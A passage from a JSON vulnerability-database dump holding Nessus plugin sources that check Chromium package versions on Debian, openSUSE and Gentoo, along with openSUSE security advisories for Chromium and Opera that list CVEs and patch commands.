reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"90.0.4430.85-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-31T14:58:11", "description": "This update for chromium fixes the following issues :\n\n - Chromium was updated to 90.0.4430.93 (boo#1184764,boo#1185047,boo#1185398)\n\n - CVE-2021-21227: Insufficient data validation in V8. \n\n - CVE-2021-21232: Use after free in Dev Tools. \n\n - CVE-2021-21233: Heap buffer overflow in ANGLE.\n\n - CVE-2021-21228: Insufficient policy enforcement in extensions.\n\n - CVE-2021-21229: Incorrect security UI in downloads.\n\n - CVE-2021-21230: Type Confusion in V8. \n\n - CVE-2021-21231: Insufficient data validation in V8.\n\n - CVE-2021-21222: Heap buffer overflow in V8\n\n - CVE-2021-21223: Integer overflow in Mojo\n\n - CVE-2021-21224: Type Confusion in V8\n\n - CVE-2021-21225: Out of bounds memory access in V8\n\n - CVE-2021-21226: Use after free in navigation\n\n - CVE-2021-21201: Use after free in permissions\n\n - CVE-2021-21202: Use after free in extensions\n\n - CVE-2021-21203: Use after free in Blink\n\n - CVE-2021-21204: Use after free in Blink\n\n - CVE-2021-21205: Insufficient policy enforcement in navigation\n\n - CVE-2021-21221: Insufficient validation of untrusted input in Mojo\n\n - CVE-2021-21207: Use after free in IndexedDB\n\n - CVE-2021-21208: Insufficient data validation in QR scanner\n\n - CVE-2021-21209: Inappropriate implementation in storage\n\n - CVE-2021-21210: Inappropriate implementation in Network\n\n - CVE-2021-21211: Inappropriate implementation in Navigatio \n\n - CVE-2021-21212: Incorrect security UI in Network Config UI\n\n - CVE-2021-21213: Use after free in WebMIDI", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2021-629)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2022-05-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-629.NASL", "href": "https://www.tenable.com/plugins/nessus/149603", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-629.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149603);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2021-21201\",\n \"CVE-2021-21202\",\n \"CVE-2021-21203\",\n \"CVE-2021-21204\",\n \"CVE-2021-21205\",\n \"CVE-2021-21207\",\n \"CVE-2021-21208\",\n \"CVE-2021-21209\",\n \"CVE-2021-21210\",\n \"CVE-2021-21211\",\n \"CVE-2021-21212\",\n \"CVE-2021-21213\",\n \"CVE-2021-21221\",\n \"CVE-2021-21222\",\n \"CVE-2021-21223\",\n \"CVE-2021-21224\",\n \"CVE-2021-21225\",\n \"CVE-2021-21226\",\n \"CVE-2021-21227\",\n \"CVE-2021-21228\",\n \"CVE-2021-21229\",\n \"CVE-2021-21230\",\n \"CVE-2021-21231\",\n \"CVE-2021-21232\",\n \"CVE-2021-21233\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2021-629)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\n - Chromium was updated to 90.0.4430.93\n (boo#1184764,boo#1185047,boo#1185398)\n\n - CVE-2021-21227: Insufficient data validation in V8. \n\n - CVE-2021-21232: Use after free in Dev Tools. \n\n - CVE-2021-21233: Heap buffer overflow in ANGLE.\n\n - CVE-2021-21228: Insufficient policy enforcement in\n extensions.\n\n - CVE-2021-21229: Incorrect security UI in downloads.\n\n - CVE-2021-21230: Type Confusion in V8. \n\n - CVE-2021-21231: Insufficient data validation in V8.\n\n - CVE-2021-21222: Heap buffer overflow in V8\n\n - CVE-2021-21223: Integer overflow in Mojo\n\n - CVE-2021-21224: Type Confusion in V8\n\n - CVE-2021-21225: Out of bounds memory access in V8\n\n - CVE-2021-21226: Use after free in navigation\n\n - CVE-2021-21201: Use after free in permissions\n\n - CVE-2021-21202: Use after free in extensions\n\n - CVE-2021-21203: Use after free in Blink\n\n - CVE-2021-21204: Use after free in Blink\n\n - CVE-2021-21205: Insufficient policy enforcement in\n navigation\n\n - CVE-2021-21221: Insufficient validation of untrusted\n input in Mojo\n\n - CVE-2021-21207: Use after free in IndexedDB\n\n - CVE-2021-21208: Insufficient data validation in QR\n scanner\n\n - CVE-2021-21209: Inappropriate implementation in storage\n\n - CVE-2021-21210: Inappropriate implementation in Network\n\n - CVE-2021-21211: Inappropriate implementation in\n Navigatio \n\n - CVE-2021-21212: Incorrect security UI in Network Config\n UI\n\n - CVE-2021-21213: Use after free in WebMIDI\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=11845047\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1184764\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1185398\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21233\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-90.0.4430.93-lp152.2.89.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-90.0.4430.93-lp152.2.89.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-90.0.4430.93-lp152.2.89.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-90.0.4430.93-lp152.2.89.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T14:39:40", "description": "The remote host is affected by the vulnerability described in GLSA-202104-08 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2021-05-03T00:00:00", "type": "nessus", "title": "GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-2119", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2022-05-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202104-08.NASL", "href": "https://www.tenable.com/plugins/nessus/149223", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202104-08.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149223);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/11\");\n\n script_cve_id(\"CVE-2021-21142\", \"CVE-2021-21143\", \"CVE-2021-21144\", \"CVE-2021-21145\", \"CVE-2021-21146\", \"CVE-2021-21147\", \"CVE-2021-21148\", \"CVE-2021-21149\", \"CVE-2021-21150\", \"CVE-2021-21151\", \"CVE-2021-21152\", \"CVE-2021-21153\", \"CVE-2021-21154\", \"CVE-2021-21155\", \"CVE-2021-21156\", \"CVE-2021-21157\", \"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-2119\", \"CVE-2021-21191\", \"CVE-2021-21192\", \"CVE-2021-21193\", \"CVE-2021-21194\", \"CVE-2021-21195\", \"CVE-2021-21196\", \"CVE-2021-21197\", \"CVE-2021-21198\", \"CVE-2021-21199\", \"CVE-2021-21201\", \"CVE-2021-21202\", \"CVE-2021-21203\", \"CVE-2021-21204\", \"CVE-2021-21205\", \"CVE-2021-21206\", \"CVE-2021-21207\", \"CVE-2021-21208\", \"CVE-2021-21209\", \"CVE-2021-21210\", \"CVE-2021-21211\", \"CVE-2021-21212\", \"CVE-2021-21213\", \"CVE-2021-21214\", \"CVE-2021-21215\", \"CVE-2021-21216\", \"CVE-2021-21217\", \"CVE-2021-21218\", \"CVE-2021-21219\", \"CVE-2021-21220\", \"CVE-2021-21221\", \"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\", \"CVE-2021-21227\", \"CVE-2021-21228\", \"CVE-2021-21229\", \"CVE-2021-21230\", \"CVE-2021-21231\", \"CVE-2021-21232\", \"CVE-2021-21233\");\n script_xref(name:\"GLSA\", value:\"202104-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202104-08\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202104-08\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-90.0.4430.93'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-90.0.4430.93'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21233\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2022-04-21T22:47:33", "description": "An update that fixes 7 vulnerabilities is now available.\n\nDescription:\n\n This update for opera fixes the following issues:\n\n Update to version 76.0.4017.94\n\n - released on the stable branch\n\n Update to version 76.0.4017.88\n\n - CHR-8404 Update chromium on desktop-stable-90-4017 to 90.0.4430.85\n - DNA-92219 Add bookmark API supports to the front-end\n - DNA-92409 [MAC] \ufffd\ufffd\ufffdPresent now\ufffd\ufffd\ufffd options windows appear behind\n detached window\n - DNA-92615 Capture tab from the tab context menu\n - DNA-92616 Capture tab from Snapshot\n - DNA-92617 Capture tab from image context menu\n - DNA-92652 Opera 76 translations\n - DNA-92680 Make image selector on any page work like bookmarks popup WP2\n - DNA-92707 Crash at void base::ObserverList::AddObserver(class\n content::PrerenderHost::Observer*)\n - DNA-92710 Autoupdate on macOS 11.3 not working\n - DNA-92711 Make image selector on any page work like bookmarks popup WP3\n - DNA-92730 Make image selector on any page work like bookmarks popup WP4\n - DNA-92761 Make image selector on any page work like bookmarks popup WP5\n - DNA-92776 Make image selector on any page work like bookmarks popup WP6\n - DNA-92862 Make \ufffd\ufffd\ufffdView pinboards\ufffd\ufffd\ufffd button work\n - DNA-92906 Provide in-house translations for Cashback strings to Spanish\n - DNA-92908 API collides with oneclick installer\n - The update to chromium 90.0.4430.85 fixes following issues:\n - CVE-2021-21222, CVE-2021-21223, CVE-2021-21224, CVE-2021-21225,\n CVE-2021-21226\n\n - Complete Opera 76.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-76/\n\n Update to version 75.0.3969.218\n\n - CHR-8393 Update chromium on desktop-stable-89-3969 to 89.0.4389.128\n - DNA-92113 Windows debug fails to compile\n opera_components/ipfs/ipfs/ipfs_url_loader_throttle.obj\n - DNA-92198 [Arm] Update signing scripts\n - DNA-92200 [Arm] Create universal packages from two buildsets\n - DNA-92338 [Search tabs] The preview isn\ufffd\ufffd\ufffdt updated when the tab from\n another window is closed\n - DNA-92410 [Download popup] Selected item still looks bad in dark mode\n - DNA-92441 Compilation error\n - DNA-92514 Allow to generate universal DMG package from existing\n universal .tar.xz\n - DNA-92608 Opera 75 crash during rapid workspace switching\n - DNA-92627 Crash at automation::Error::code()\n - DNA-92630 Crash at\n opera::PremiumExtensionPersistentPrefStorageImpl::IsPremiumExtensionFeature\n Enabled()\n - DNA-92648 Amazon icon disappears from Sidebar Extensions section after\n pressing Hide Amazon button\n - DNA-92681 Add missing string in Japanese\n - DNA-92684 Fix issues with signing multiple bsids\n - DNA-92706 Update repack generation from universal packages\n - DNA-92725 Enable IPFS for all channels\n\n - The update to chromium 89.0.4389.128 fixes following issues:\n CVE-2021-21206, CVE-2021-21220\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:NonFree:\n\n zypper in -t patch openSUSE-2021-712=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-05-11T00:00:00", "type": "suse", "title": "Security update for opera (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-05-11T00:00:00", "id": "OPENSUSE-SU-2021:0712-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UVVTKODULIJ72SWD273BSN4VWATWGOOD/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T12:40:30", "description": "An update that fixes two vulnerabilities is now available.\n\nDescription:\n\n This update for chromium fixes the following issues:\n\n - Chromium 89.0.4389.128 (boo#1184700):\n * CVE-2021-21206: Use after free in blink\n * CVE-2021-21220: Insufficient validation of untrusted input in v8 for\n x86_64\n\n This update was imported from the openSUSE:Leap:15.2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2021-575=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-19T00:00:00", "type": "suse", "title": "Security update for chromium (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-04-19T00:00:00", "id": "OPENSUSE-SU-2021:0575-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/7IO7QUUW232VPDW2BITKAFAZ63OJKMQB/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T12:40:30", "description": "An update that fixes two vulnerabilities is now available.\n\nDescription:\n\n This update for chromium fixes the following issues:\n\n - Chromium 89.0.4389.128 (boo#1184700):\n * CVE-2021-21206: Use after free in blink\n * CVE-2021-21220: Insufficient validation of untrusted input in v8 for\n x86_64\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-567=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-17T00:00:00", "type": "suse", "title": "Security update for chromium (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-04-17T00:00:00", "id": "OPENSUSE-SU-2021:0567-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/5J4EIEBQDVS2O3BUI7IGNQ45JQRY7IQ5/", "cvss": {"score": 